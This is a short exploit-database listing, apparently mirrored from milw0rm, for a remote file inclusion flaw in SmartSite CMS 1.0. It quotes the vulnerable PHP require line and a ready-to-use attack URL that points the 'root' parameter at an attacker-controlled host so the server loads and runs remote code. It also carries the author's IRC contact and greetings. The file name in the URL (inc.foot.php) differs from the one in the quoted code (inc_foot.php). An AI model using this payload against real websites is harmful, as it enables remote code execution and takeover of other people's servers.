Exploit SmartSite CMS 1.0 - 'root' Remote File Inclusion

[Exploiter]

EDB-ID

1936

Проверка EDB

1. Пройдено

Автор

ARCHIT3CT

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2006-3421 cve-2006-3162

Дата публикации

2006-06-20

# smartsite cms <= 1.0 Remote File Inclusion
#
# Contact : irc.gigachat.net #ir4dex
# Risk : High
# Class : Remote
# Script : smartsite cms
# Version : not specified
# URL: http://www.smartsitecms.net/
---------------------------------------------------------------------

Vulnerable code :

require($root . "include/inc_foot.php");

---------------------------------------------------------------------

http://www.site.com/[smartsitecmspath]/include/inc.foot.php?root=http://[attacker]

by Archit3ct and IR4DEX GROUP

Greetz: Darkfire

# milw0rm.com [2006-06-20]